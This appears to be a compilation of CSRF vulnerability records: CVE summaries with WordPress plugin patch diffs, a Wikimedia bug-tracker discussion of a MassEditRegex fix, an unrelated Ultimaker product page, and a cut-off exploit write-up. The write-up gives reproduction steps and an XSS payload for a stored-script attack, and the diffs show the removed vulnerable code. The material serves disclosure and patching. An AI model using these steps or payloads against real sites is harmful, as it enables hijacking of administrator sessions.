The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any new registered user with an administrator role.

Timestamp:

12/06/2021 04:40:59 PM (5 weeks ago)

kevinB

Message:

*   Fixed : Security issue
*   Fixed : PHP Notice on Capabilities screen

Release 2.3.1  

Location:

capability-manager-enhanced/trunk

Files:

  

*   capsman-enhanced.php (4 diffs)
*   includes/admin.php (1 diff)
*   includes/settings-handler.php (1 diff)
*   readme.txt (8 diffs)

**Legend:**

Unmodified

Added

Removed

*   **capability-manager-enhanced/trunk/capsman-enhanced.php**
    
    r2621618
    
    r2640161
    
     
    
    4
    
    4
    
     \* Plugin URI: https://publishpress.com/capability-manager/
    
    5
    
    5
    
     \* Description: Manage WordPress role definitions, per-site or network-wide. Organizes post capabilities by post type and operation.
    
    6
    
     
    
     \* Version: 2.3
    
     
    
    6
    
     \* Version: 2.3.1
    
    7
    
    7
    
     \* Author: PublishPress
    
    8
    
    8
    
     \* Author URI: https://publishpress.com/
    
    …
    
    …
    
     
    
    26
    
    26
    
     \* @license     GNU General Public License version 3
    
    27
    
    27
    
     \* @link        https://publishpress.com/
    
    28
    
     
    
     \* @version     2.3
    
     
    
    28
    
     \* @version     2.3.1
    
    29
    
    29
    
     \*/
    
    30
    
    30
    
    31
    
    31
    
    if (!defined('CAPSMAN\_VERSION')) {
    
    32
    
     
    
        define('CAPSMAN\_VERSION',           '2.3');
    
    33
    
     
    
        define('CAPSMAN\_ENH\_VERSION',       '2.3');
    
    34
    
     
    
        define('PUBLISHPRESS\_CAPS\_VERSION', '2.3');
    
     
    
    32
    
        define('CAPSMAN\_VERSION',           '2.3.1');
    
     
    
    33
    
        define('CAPSMAN\_ENH\_VERSION',       '2.3.1');
    
     
    
    34
    
        define('PUBLISHPRESS\_CAPS\_VERSION', '2.3.1');
    
    35
    
    35
    
    }
    
    36
    
    36
    
    …
    
    …
    
     
    
    146
    
    146
    
    if (
    
    147
    
    147
    
    ((defined('WP\_DEBUG') && defined('CAPSMAN\_INSTALL\_PERMISSIONS')) || (!cme\_is\_plugin\_active('press-permit-core.php') && !cme\_is\_plugin\_active('presspermit-pro.php')))
    
    148
    
     
    
    && !isset($\_GET\['pp-after-click'\])
    
     
    
    148
    
    && !isset( $\_GET\['pp-after-click'\])
    
    149
    
    149
    
    && !defined('CAPSMAN\_DISABLE\_PERMISSIONS\_PROMO')
    
    150
    
    150
    
    ) {
    
    …
    
    …
    
     
    
    157
    
    157
    
            ) {
    
    158
    
    158
    
                require\_once ( dirname(\_\_FILE\_\_) . '/includes-core/pp-capabilities-permissions.php' );
    
    159
    
     
    
            }
    
     
    
    159
    
        }
    
    160
    
    160
    
        });
    
    161
    
    161
    
    }
    
*   **capability-manager-enhanced/trunk/includes/admin.php**
    
    r2621618
    
    r2640161
    
     
    
    694
    
    694
    
                        }
    
    695
    
    695
    
     
    
    696
    
                        if (empty($caps\_manager\_postcaps\_section)) {
    
     
    
    697
    
                            $caps\_manager\_postcaps\_section = '';
    
     
    
    698
    
                        }
    
     
    
    699
    
    696
    
    700
    
                        do\_action('publishpress-caps\_manager\_postcaps\_section', compact('current', 'rcaps', 'pp\_metagroup\_caps', 'is\_administrator', 'default\_caps', 'custom\_types', 'defined', 'unfiltered', 'pp\_metagroup\_caps','caps\_manager\_postcaps\_section', 'active\_tab\_id'));
    
    697
    
    701
    
*   **capability-manager-enhanced/trunk/includes/settings-handler.php**
    
    r2589382
    
    r2640161
    
     
    
    8
    
    8
    
    9
    
    9
    
    add\_action('init', function() {
    
    10
    
     
    
    11
    
     
    
        if (!empty($\_POST\['all\_options'\])) {
    
    12
    
     
    
            foreach(explode(',', $\_POST\['all\_options'\]) as $option\_name) {
    
    13
    
     
    
                $value = isset($\_POST\[$option\_name\]) ? $\_POST\[$option\_name\] : '';
    
    14
    
     
    
    15
    
     
    
                if (!is\_array($value)) {
    
    16
    
     
    
                    $value = trim($value);
    
    17
    
     
    
                }
    
    18
    
     
    
    19
    
     
    
                update\_option($option\_name, stripslashes\_deep($value));
    
    20
    
     
    
            }
    
     
    
    10
    
        if (wp\_verify\_nonce($\_REQUEST\['\_wpnonce'\], 'pp-capabilities-settings') && current\_user\_can('manage\_capabilities')) {
    
     
    
    11
    
            if (!empty($\_POST\['all\_options'\])) {
    
     
    
    12
    
                foreach(explode(',', $\_POST\['all\_options'\]) as $option\_name) {
    
     
    
    13
    
                    foreach (\['cme\_', 'capsman', 'pp\_capabilities'\] as $prefix) {
    
     
    
    14
    
                        if (0 === strpos($option\_name, $prefix)) {
    
     
    
    15
    
                            $value = isset($\_POST\[$option\_name\]) ? $\_POST\[$option\_name\] : '';
    
     
    
    16
    
       
    
     
    
    17
    
                            if (!is\_array($value)) {
    
     
    
    18
    
                                $value = trim($value);
    
     
    
    19
    
                            }
    
     
    
    20
    
                           
    
     
    
    21
    
                            update\_option($option\_name, stripslashes\_deep($value));
    
     
    
    22
    
                        }
    
     
    
    23
    
                    }
    
     
    
    24
    
                }
    
     
    
    25
    
            }
    
     
    
    26
    
       
    
     
    
    27
    
            do\_action('pp-capabilities-update-settings');
    
    21
    
    28
    
        }
    
    22
    
     
    
    23
    
     
    
        do\_action('pp-capabilities-update-settings');
    
    24
    
    29
    
    });
    
*   **capability-manager-enhanced/trunk/readme.txt**
    
    r2621618
    
    r2640161
    
     
    
    8
    
    8
    
    Tested up to: 5.8
    
    9
    
    9
    
    Requires PHP: 5.6.20
    
    10
    
     
    
    Stable tag: 2.3
    
     
    
    10
    
    Stable tag: 2.3.1
    
    11
    
    11
    
    License: GPLv3
    
    12
    
    12
    
    License URI: https://www.gnu.org/licenses/gpl-3.0.html
    
    …
    
    …
    
     
    
    48
    
    48
    
    49
    
    49
    
    Many WordPress users have sites with custom post types. This can be done using custom code, a theme, or with a plugin. No matter how your post type is created, PublishPress Capabilities lets you enforce and assign distinct capabilities for your post type.
    
     
    
    50
    
    50
    
    51
    
    \[Click here to see how to control post type permissions\](https://publishpress.com/knowledge-base/custom-post-types-capability/).
    
    51
    
    52
    
    …
    
    …
    
     
    
    66
    
    67
    
    67
    
    68
    
    Every time you change your permissions, the PublishPress Capabilities plugin will now automatically create a backup. If you make a mistake, go to the "Backup" menu link and you'll be able to roll back to a previous version.
    
     
    
    69
    
    68
    
    70
    
    \[Click here to see how to backup permissions\](https://publishpress.com/knowledge-base/backup-restore-permissions/).
    
    69
    
    71
    
    …
    
    …
    
     
    
    71
    
    73
    
    72
    
    74
    
    With PublishPress Capabilities you can create or copy any existing WordPress user role. These roles can be customized in exactly the same way as the default WordPress roles. These new roles can be added to single sites or to an entire multisite network.
    
     
    
    75
    
    73
    
    76
    
    \[Click here to see how to create or copy user roles\](https://publishpress.com/knowledge-base/create-or-copy-user-roles/).
    
    74
    
    77
    
    …
    
    …
    
     
    
    88
    
    91
    
    89
    
    92
    
    PublishPress Capabilities enables you to decide who can upload, edit and delete files from your site's Media Library. By default, only Administrators are able to delete files in your Media Library. Subscribers and Contributors are not even allowed to upload files. You can customize these permissions for the Media Library and also the Featured Image box.
    
     
    
    93
    
    90
    
    94
    
    \[Click here to learn about Media Library permissions\](https://publishpress.com/knowledge-base/control-media-library-access/).
    
    91
    
    95
    
    …
    
    …
    
     
    
    93
    
    97
    
    94
    
    98
    
    We mentioned earlier that PublishPress Capabilities has special support for WooCommerce taxonomies. This is true for the rest of WooCommerce also. With PublishPress Capabilities you can control permissions for WooCommerce products, orders and coupons.
    
     
    
    99
    
    95
    
    100
    
    \[Click here to learn about WooCommerce permissions\](https://publishpress.com/knowledge-base/woocommerce-permissons/).
    
    96
    
    101
    
    …
    
    …
    
     
    
    98
    
    103
    
    99
    
    104
    
    PublishPress Capabilities allows you to control permissions on a single site or across your whole network. Every time you update permissions in PublishPress Capabilities, you can choose to sync those changes across your multisite network.
    
     
    
    105
    
    100
    
    106
    
    \[Click here to learn about multisite permissions\](https://publishpress.com/knowledge-base/multisite-network/).
    
    101
    
    107
    
    …
    
    …
    
     
    
    150
    
    156
    
    Fixed : Non-administrators with user editing capabilities could add new Administrators
    
    151
    
    157
    
     
    
    158
    
    \= 2.3.1 =
    
     
    
    159
    
    Fixed : Security issue. Please update.
    
     
    
    160
    
    152
    
    161
    
    \== Changelog ==
    
     
    
    162
    
     
    
    163
    
    \= 2.3.1 - 6 Dec 2021 =
    
     
    
    164
    
      \* Fixed : Security issue
    
     
    
    165
    
      \* Fixed : PHP Notice on Capabilities screen
    
    153
    
    166
    
    154
    
    167
    
    \= 2.3 - 28 Oct 2021 =
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2021-25032: Changeset 2640161 – WordPress Plugin Repository

The WP Coder WordPress plugin before 2.5.2 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

**wp-coder/trunk/README.txt**

r2640134

r2641650

 

6

6

Tested up to: 5.8

7

7

Requires PHP: 5.3

8

 

Stable tag: 2.5.1

 

8

Stable tag: 2.5.2

9

9

License: GPLv2 or later

10

10

License URI: http://www.gnu.org/licenses/gpl-2.0.html

…

…

 

57

57

58

58

\== Changelog ==

 

59

\= 2.5.2 =

 

60

Fixed: minor bug on main page of the plugin

 

61

59

62

\= 2.5.1 =

60

63

Fixed: minor bug.

**wp-coder/trunk/admin/general/main.php**

r2413249

r2641650

 

1

 

<?php if ( ! defined( 'ABSPATH' ) ) exit;

2

 

    /\*\*

3

 

        \* Main Page

4

 

        \*

5

 

        \* @package    Lead\_Generation

6

 

        \* @subpackage 

7

 

        \* @copyright   Copyright (c) 2018, Dmytro Lobov

8

 

        \* @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License

9

 

        \* @since       1.0

10

 

    \*/

11

 

   

12

 

    $logo = plugin\_dir\_url( \_\_FILE\_\_ ).'image/icon.png.';

 

1

<?php

 

2

/\*\*

 

3

 \* Main Page

 

4

 \*

 

5

 \* @package     Wow\_Plugin

 

6

 \* @subpackage  Wow-Company/Main

 

7

 \* @author      Wow-Company <givememony1982@gmail.com>

 

8

 \* @copyright   2019 Wow-Company (Wow-Company)

 

9

 \* @license     GNU Public License

 

10

 \* @version     0.1

 

11

 \*/

 

12

 

13

if ( ! defined( 'ABSPATH' ) ) {

 

14

    exit;

 

15

}

 

16

$logo = plugin\_dir\_url( \_\_FILE\_\_ ) . 'image/icon.png';

13

17

?>

14

18

<style>

…

…

 

48

52

        font-family: dashicons;

49

53

        font-size: 12px;

50

 

        line-height: 12px;

 

54

        line-height: 14px;

51

55

    }

52

56

…

…

 

81

85

        background: #303030;

82

86

    }

 

87

83

88

    .wow-thank-you {

84

89

        color: #777777;

85

90

        font-style: italic;

86

91

    }

87

 

    .about-wrap.full-width-layout {

88

 

        max-width: 100%;

 

92

 

93

    .about-wrap {

 

94

        margin: 0 auto 3rem;

89

95

    }

90

96

</style>

91

97

92

98

93

 

<div class="wrap about-wrap full-width-layout">

94

 

   

95

 

    <h1><?php esc\_attr\_e( 'Welcome', 'wpcoder' ); ?> </h1>

96

 

   

97

 

    <p class="about-text">     

98

 

    <?php esc\_attr\_e( 'Congratulations! You are about to use one of the plugins from Wow-Company.', 'wpcoder' ); ?> </p>

99

 

    <p>

100

 

        <a href="https://www.facebook.com/wowaffect/" class="wow-subscribe" target="\_blank">Stay in touch <span class="dashicons dashicons-facebook-alt"></span></a>

101

 

    </p>

102

 

    <span  class="wow-badge">Wow-Company</span>

103

 

   

104

 

    <?php

105

 

        $current = ( isset( $\_GET\['tab'\] ) ) ? sanitize\_text\_field( wp\_unslash( $\_GET\['tab'\] ) ) : 'wow-plugins';

106

 

        $tabs = array(                                     

107

 

        'wow-plugins'  => \_\_( 'Plugins', 'wpcoder' ),

108

 

        );

109

 

       

110

 

        echo '<h2 class="nav-tab-wrapper wp-clearfix">';

111

 

        foreach ( $tabs as $tab => $name ) {

112

 

            $class = ( $tab === $current ) ? ' nav-tab-active' : '';

113

 

            echo '<a class="nav-tab' .esc\_attr( $class ) . '" href="?page=wow-company&tab=' . esc\_attr( $tab ) . '">' . esc\_attr( $name ) . '</a>';

114

 

        }

115

 

        echo '</h2>';

116

 

       

117

 

        echo '<div class="stem-content">';

118

 

        include ( $current.'.php' );

119

 

        echo '</div>';

120

 

    ?>

 

99

<div class="wrap full-width-layout">

 

100

    <div class="about-wrap">

 

101

 

102

 

103

        <h1><?php esc\_attr\_e( 'Welcome' ); ?> </h1>

 

104

 

105

        <p class="about-text">

 

106

            <?php esc\_attr\_e( 'Congratulations! You are about to use one of the plugins from Wow-Company.' ); ?>

 

107

        </p>

 

108

        <p>Several plugins below has free and pro versions you can install it and hopefully useful. Enjoy it.</p>

 

109

        <span class="wow-badge">Wow-Company</span>

 

110

    </div>

 

111

    <div class="stem-content">

 

112

        <?php include( 'wow-plugins.php' ); ?>

 

113

    </div>

 

114

121

115

</div>

122

116

 

117

**wp-coder/trunk/admin/general/wow-plugins.php**

r2413249

r2641650

 

5

5

 \* @package     Wow\_Plugin

6

6

 \* @subpackage  Wow-Company/Plugins

7

 

 \* @author      Dmytro Lobov <i@wpbiker.com>

 

7

 \* @author      Wow-Company <support@wow-company.com>

8

8

 \* @copyright   2019 Wow-Company

9

9

 \* @license     GNU P

…

…

 

36

36

?>

37

37

<style>

38

 

    .height\_screen {

39

 

        height: 300px;

40

 

        background: #fff;

41

 

    }

 

38

  .height\_screen {

 

39

    height: 270px;

 

40

    background: #fff;

 

41

  }

42

42

43

 

    .height\_screen img {

44

 

        max-width: 100%;

45

 

    }

 

43

  .height\_screen img {

 

44

    max-width: 100%;

 

45

  }

46

46

47

 

    .height\_screen span {

48

 

        padding: 10px;

49

 

        font-size: 16px;

50

 

        font-weight: 500;

51

 

        display: block;

52

 

    }

 

47

  .height\_screen span {

 

48

    padding: 10px;

 

49

    font-size: 16px;

 

50

    font-weight: 500;

 

51

    display: block;

 

52

  }

53

53

54

 

    .height\_screen a {

55

 

        color: #000;

56

 

        text-decoration: none;

57

 

    }

 

54

  .height\_screen a {

 

55

    color: #000;

 

56

    text-decoration: none;

 

57

  }

58

58

59

 

    .themes {

60

 

        overflow: hidden;

61

 

    }

 

59

  .themes {

 

60

    overflow: hidden;

 

61

  }

62

62

63

 

    .theme-actions {

64

 

        background: rgba(244, 244, 244, 1) !important;

65

 

    }

66

 

67

 

    .theme-name {

68

 

        text-align: left !important;

69

 

    }

70

 

71

 

    .install {

72

 

        float: right;

73

 

    }

 

63

  .theme-actions {

 

64

    background: rgba(244, 244, 244, 1) !important;

 

65

  }

 

66

  .theme-name {

 

67

    text-align: left !important;

 

68

  }

 

69

  .install {

 

70

    float: right;

 

71

  }

 

72

</style>

74

73

75

74

76

 

</style><h3>Several plugins below has free and pro versions you can install it and hopefully useful. Enjoy it.</h3>

77

 

78

75

<div class="theme-browser">

79

 

    <div class="themes">

 

76

  <div class="themes">

80

77

        <?php

81

78

        $image = 'https://wow-estore.com/a-plugins/img/';

82

79

        foreach ( $items as $key => $value ) { ?>

83

80

84

 

            <div class="theme">

85

 

                <div class="height\_screen">

86

 

                    <a target="\_blank" href="<?php echo esc\_url( $value\[3\] ); ?>" target="\_blank"><img

87

 

                                src="<?php echo esc\_url( $image . $value\[2\] ); ?>"/>

88

 

                        <span><?php echo esc\_attr( $value\[1\] ); ?></span>

89

 

                    </a>

90

 

                </div>

91

 

                <div class="theme-author"></div>

92

 

                <div class="theme-id-container">

93

 

                    <h2 class="theme-name">

94

 

                        <span><?php echo esc\_attr( $value\[0\] ); ?></span>

 

81

      <div class="theme">

 

82

        <div class="height\_screen">

 

83

          <a target="\_blank" href="<?php echo esc\_url( $value\[3\] ); ?>" target="\_blank"><img

 

84

              src="<?php echo esc\_url( $image . $value\[2\] ); ?>"/>

 

85

            <span><?php echo esc\_attr( $value\[1\] ); ?></span>

 

86

          </a>

 

87

        </div>

 

88

        <div class="theme-author"></div>

 

89

        <div class="theme-id-container">

 

90

          <h2 class="theme-name">

 

91

            <span><?php echo esc\_attr( $value\[0\] ); ?></span>

95

92

                        <?php if ( ! empty( $value\[5\] ) ) : ?>

96

 

                            <span class="install"><?php echo esc\_attr( $value\[5\] ); ?>+ <?php \_e( 'Active Installs' ); ?></span>

 

93

              <span class="install"><?php echo esc\_attr( $value\[5\] ); ?>+ <?php \_e( 'Active Installs' ); ?></span>

97

94

                        <?php endif; ?>

98

 

                    </h2>

99

 

                    <div class="theme-actions">

 

95

          </h2>

 

96

          <div class="theme-actions">

100

97

                        <?php if ( ! empty( $value\[3\] ) ) : ?>

101

 

                            <a class="button activate" href="<?php echo esc\_url( $value\[3\] ); ?>">Try FREE</a>

 

98

              <a class="button activate" href="<?php echo esc\_url( $value\[3\] ); ?>">Try FREE</a>

102

99

                        <?php endif; ?>

103

100

                        <?php if ( ! empty( $value\[4\] ) ) : ?>

104

 

                            <a class="button button-primary" href="<?php echo esc\_url( $value\[4\] ); ?>" target="\_blank">Get

105

 

                                PRO</a>

 

101

              <a class="button button-primary" href="<?php echo esc\_url( $value\[4\] ); ?>" target="\_blank">Get PRO</a>

106

102

                        <?php endif; ?>

107

 

                    </div>

108

 

                </div>

109

 

            </div>

 

103

          </div>

 

104

        </div>

 

105

      </div>

110

106

        <?php } ?>

111

 

    </div>

 

107

  </div>

112

108

</div>

113

109

114

110

<p class="wow-thank-you">

115

 

    <span class="thank-line">= = = = = = =</span><br/>

116

 

    Thank you for choosing 'Wow Plugin'<br/>

117

 

    Dmyto Lobov<br/>

118

 

    <a href="https://wow-estore.com" target="\_blank">Wow-Estore.com</a>

 

111

  <span class="thank-line">= = = = = = =</span><br/>

 

112

  Thank you for choosing 'Wow Plugin'<br/>

 

113

  Dmyto Lobov<br/>

 

114

  <a href="https://wow-estore.com" target="\_blank">Wow-Estore.com</a>

119

115

</p>

**wp-coder/trunk/wp-coder.php**

r2640134

r2641650

 

4

4

 \* Plugin URI:        https://wordpress.org/plugins/wp-coder/

5

5

 \* Description:       Add custom CSS, HTML, JavaScript on your website page

6

 

 \* Version:           2.5.1

 

6

 \* Version:           2.5.2

7

7

 \* Author:            Wow-Company

8

8

 \* Author URI:        https://wow-estore.com/

…

…

 

35

35

                    'plugin\_menu'     => 'WP Coder',

36

36

                    'plugin\_home\_url' => 'https://wordpress.org/plugins/wp-coder/',

37

 

                    'plugin\_version'  => '2.5.1',

 

37

                    'plugin\_version'  => '2.5.2',

38

38

                    'plugin\_file'     => basename( \_\_FILE\_\_ ),

39

39

                    'plugin\_slug'     => dirname( plugin\_basename( \_\_FILE\_\_ ) ),

CVE-2021-25053: Changeset 2641650 for wp-coder – WordPress Plugin Repository

An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. MassEditRegex allows CSRF.

**

MassEditRegex is Vulnerable to CSRF Attacks (CVE-2021-46147)

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

MassEditRegex is currently not checking for CSRF tokens making it vulnerable to CSRF attacks.

Risk Rating

Medium

Author Affiliation

Wikimedia Communities

*   Task Graph
*   Mentions

**Event Timeline**

Comment Actions

Here is a patch but I am not sure how to get it through Gerrit. Does that need to be done by the Security Team even for non-Wikimedia-deployed extensions?  

Comment Actions

@R4356th - a few things:

1.  For Wikimedia-deployed skins and extensions, when we find a vulnerability like this, we create a protected task and post a patch (as you've done) so that we can privately deploy the patch to production and then disclose it with one of our proper MediaWiki security releases (recent: T285404) or supplemental announcements (recent: T285414). But this process _likely isn't necessary_ for many skins and extensions used by non-Wikimedia/WMF operators of MediaWiki.
2.  What the Security-Team would suggest, prior to publicly disclosing an issue via gerrit, is for the skin/extension maintainers or discoverers of any vulnerabilities like this, to reach out to as many people as possible (tagging them on this task if they have Phabricator accounts would work) so they can code-review and then deploy this patch to their MediaWiki installations prior to public disclosure. Unfortunately, this can be a tedious process and sites like WikiApiary, while helpful, are not always representative of actual usage of a given skin or extension.
3.  If you and/or the maintainers of the MassEditRegex extension are happy with the patch above and with any efforts to pre-announce the issue to affected parties and have them patch their MediaWiki installations, then we can push this up to gerrit as a standard change set for review and merge. I'd be happy to help with that, but the basic steps would be:
    1.  git clone "https://gerrit.wikimedia.org/r/mediawiki/extensions/MassEditRegex"
    2.  git apply --check --whitespace=fix /path/to/patchfile // rebase/3-way merge if necessary
    3.  git am < /path/to/patchfile
    4.  git review -R // assuming you have git-review installed
4.  We can also track this for the next supplemental security release (T292236 - though currently private) and help procure a proper CVE, if so desired.

Comment Actions

> 1.  What the Security-Team would suggest, prior to publicly disclosing an issue via gerrit, is for the skin/extension maintainers or discoverers of any vulnerabilities like this, to reach out to as many people as possible (tagging them on this task if they have Phabricator accounts would work) so they can code-review and then deploy this patch to their MediaWiki installations prior to public disclosure. Unfortunately, this can be a tedious process and sites like WikiApiary, while helpful, are not always representative of actual usage of a given skin or extension.

Reaching out to 202 wikis is, as you say, tedious and something I would be interested in skipping.

> 1.  If you and/or the maintainers of the MassEditRegex extension are happy with the patch above and with any efforts to pre-announce the issue to affected parties and have them patch their MediaWiki installations, then we can push this up to gerrit as a standard change set for review and merge. I'd be happy to help with that, but the basic steps would be:
>     1.  git clone "https://gerrit.wikimedia.org/r/mediawiki/extensions/MassEditRegex"
>     2.  git apply --check --whitespace=fix /path/to/patchfile // rebase/3-way merge if necessary
>     3.  git am < /path/to/patchfile
>     4.  git review -R // assuming you have git-review installed

Well, I have tested the patch but the author (whom I have added here) does not seem active and I do not have +2 access. Could you or someone else from the Security-Team please help with that?

> 1.  We can also track this for the next supplemental security release (T292236 - though currently private) and help procure a proper CVE, if so desired.

That would be great. :)

Comment Actions

Hi all, definitely haven't touched this for a while so can't help much, but I've eyeballed the patch and it looks fine so I'd be happy to +2 it if I still can.

I can't easily test it at the moment as I only have the 1.35.4 LTS version running and the latest git commit limits the extension to >= 1.36, so not sure how backporting the patch to the LTS version is handled.

The extension has two methods for editing pages - a form POST (which is fixed by this patch) and API calls from client-side Javascript code. I presume these API calls aren't affected by the issue?

Comment Actions

> Hi all, definitely haven't touched this for a while so can't help much, but I've eyeballed the patch and it looks fine so I'd be happy to +2 it if I still can.

Thank you! I am going to let you take care of uploading the patch in that case to make sure the vuln is not exploited by the time the patch is merged.

> I can't easily test it at the moment as I only have the 1.35.4 LTS version running and the latest git commit limits the extension to >= 1.36, so not sure how backporting the patch to the LTS version is handled.

That commit did not touch SpecialMassEditRegex.php. I do not think backporting would be difficult.

> The extension has two methods for editing pages - a form POST (which is fixed by this patch) and API calls from client-side Javascript code. I presume these API calls aren't affected by the issue?

Yeah, I do not think the JS API can be exploited.

Comment Actions

> > Hi all, definitely haven't touched this for a while so can't help much, but I've eyeballed the patch and it looks fine so I'd be happy to +2 it if I still can.
> 
> Thank you! I am going to let you take care of uploading the patch in that case to make sure the vuln is not exploited by the time the patch is merged.

Did you still want to get a change set up to gerrit for review? Looks like I have +2 on that repo, so I could merge it if it passes CI and someone +1s it as confirmed testing and working for master. Let me know.

Comment Actions

Please do if you can, I'm not very familiar with Gerrit etc. so it would be good to have someone who knows what they're doing involved!

Comment Actions

> Did you still want to get a change set up to gerrit for review? Looks like I have +2 on that repo, so I could merge it if it passes CI and someone +1s it as confirmed testing and working for master. Let me know.

Yes, that would be great! I have locally confirmed the patch works.

sbassett triaged this task as Medium priority.Oct 22 2021, 8:44 PM

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed Risk Rating from N/A to Medium.

Comment Actions

Patch for master is up for review (see above). And thus, this issue has been publicly disclosed, per previous discussions from the ostensible project maintainers. We can theoretically make this task public as well, if that is desired right now. Once the gerrit change set is reviewed and merged, we can attempt any necessary backports and request a CVE as part of the next supplemental security release (T292236), due out later this coming December.

Reedy closed this task as Resolved.Dec 10 2021, 8:20 PM

mmartorana renamed this task from MassEditRegex is Vulnerable to CSRF Attacks to MassEditRegex is Vulnerable to CSRF Attacks (CVE-2021-46147).Mon, Jan 10, 5:02 PM

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2021-46147: ⚓ T293341 MassEditRegex is Vulnerable to CSRF Attacks (CVE-2021-46147)

In Ultimaker S3 3D printer, Ultimaker S5 3D printer, Ultimaker 3 3D printer S-line through 6.3 and Ultimaker 3 through 5.2.16, the local webserver hosts APIs vulnerable to CSRF. They do not verify incoming requests.

Ultimaker uses functional, analytical and tracking cookies. Tracking cookies enhance your experience on our website and may also collect your personal data outside of Ultimaker websites. If you agree with the use of tracking cookies, click “I agree, continue browsing”. You can withdraw your consent at any time. If you do not consent with the use of tracking cookies, click “Refuse”. You can find more information about cookies on our Privacy and Cookie Policy page.

We stopped manufacturing the Ultimaker 3 in spring 2020. Its successor, the Ultimaker S3, has the same form factor and reliable dual extrusion. But is also easier to use and more powerful.

Discover Ultimaker S3 Ultimaker 3 support

**3D printers that simply work**

Our award-winning 3D printers are robust, reliable, and easy to use. They deliver quality parts time and again. Designed and tested to run 24/7, they allow you to achieve the results you need more quickly and easily.

Download the PDF

**Software ready for Industry 4.0**

Trusted by millions of users across 14 languages, Ultimaker  Cura  slices your model and integrates with any workflow through Marketplace plugins. Then scale production and digital distribution with Ultimaker Digital Factory.

Learn about our software

**Material choice like never before**

Ultimaker offers the widest material choice on the market. Through our Material Alliance, choose the perfect filament for your application – from advanced polymers to carbon fiber composites.

Learn about our materials

**Support dedicated to your success**

Wherever you are in the world, Ultimaker support is close by. Our global network of service partners offer professional installation, training, and maintenance in your language and time zone.​

Learn about our support

CVE-2021-34086: Ultimaker 3

A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.

**Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-cross-site-request-forgery-csrf-leads-to-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS

**1\. Vehicle Service Management System - 'Mechanic List' (/admin/?page=mechanics)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Mechanic List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Full Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Mechanic List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**2\. Vehicle Service Management System - 'Service Requests' (/admin/?page=service\_requests)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Service Requests section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Owner Contact input field.
7.  Click on Save Request button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Service Requests section in Browser B (Firefox).
12.  Choose the newly created Service Requests and click on Action under View.
13.  Malicious javascript code triggered.

**3\. Vehicle Service Management System - 'Category List' (/admin/?page=maintenance/category)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Category List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Category Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Category List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**4\. Vehicle Service Management System - 'Service List' (/admin/?page=maintenance/services)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Service List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Service Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
